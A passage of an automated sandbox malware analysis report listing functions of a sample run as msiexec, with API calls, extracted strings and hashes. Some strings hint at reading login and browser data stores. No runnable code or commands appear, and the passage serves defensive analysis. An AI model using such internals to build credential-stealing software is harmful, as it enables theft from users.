                                                              • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                              • String ID: BIN
                                                              • API String ID: 1668488027-1015027815
                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                              Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00411AF6
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                              • wcscat.MSVCRT ref: 00411B2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                              • String ID: AE$.cfg$General$EA
                                                              • API String ID: 776488737-1622828088
                                                              • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                              • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                              Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D8BD
                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                              • memset.MSVCRT ref: 0040D906
                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 1028950076-4169760276
                                                              • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                              • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                              Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                              • memset.MSVCRT ref: 0041BA3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: -journal$-wal
                                                              • API String ID: 438689982-2894717839
                                                              • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                              • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                              Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Item$Dialog$MessageSend
                                                              • String ID:
                                                              • API String ID: 3975816621-0
                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                              Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                              • String ID: .save$http://$https://$log profile$signIn
                                                              • API String ID: 1214746602-2708368587
                                                              • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                              • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                              Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                              • memset.MSVCRT ref: 00405E33
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                              • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                              • String ID:
                                                              • API String ID: 2313361498-0
                                                              • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                              • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                              Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageRectSend$Client
                                                              • String ID:
                                                              • API String ID: 2047574939-0
                                                              • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                              • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                              Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                              • String ID:
                                                              • API String ID: 4218492932-0
                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                              Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: gj
                                                              • API String ID: 438689982-4203073231
                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                              Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                              • API String ID: 3510742995-2446657581
                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                              Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                              • memset.MSVCRT ref: 00405ABB
                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                              • SetFocus.USER32(?), ref: 00405B76
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$FocusItemmemset
                                                              • String ID:
                                                              • API String ID: 4281309102-0
                                                              • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                              • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                              Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscat
                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                              • API String ID: 384018552-4153097237
                                                              • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                              • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                              Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 2029023288-3849865405
                                                              • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                              • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                              Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                              • memset.MSVCRT ref: 00405455
                                                              • memset.MSVCRT ref: 0040546C
                                                              • memset.MSVCRT ref: 00405483
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy$ErrorLast
                                                              • String ID: 6$\
                                                              • API String ID: 404372293-1284684873
                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                              Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesErrorFileLastSleep$free
                                                              • String ID:
                                                              • API String ID: 1470729244-0
                                                              • Opcode ID: 09b49c58799734cfd5cd4ac30739c3777d201f49183e4126d4f53e2d18a03a45
                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                              • Opcode Fuzzy Hash: 09b49c58799734cfd5cd4ac30739c3777d201f49183e4126d4f53e2d18a03a45
                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                              Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                              • wcscpy.MSVCRT ref: 0040A107
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                              • String ID:
                                                              • API String ID: 1331804452-0
                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                              Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: advapi32.dll
                                                              • API String ID: 2012295524-4050573280
                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                              Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • <%s>, xrefs: 004100A6
                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                              • API String ID: 3473751417-2880344631
                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                              Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset
                                                              • String ID: %2.2X
                                                              • API String ID: 2521778956-791839006
                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                              Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
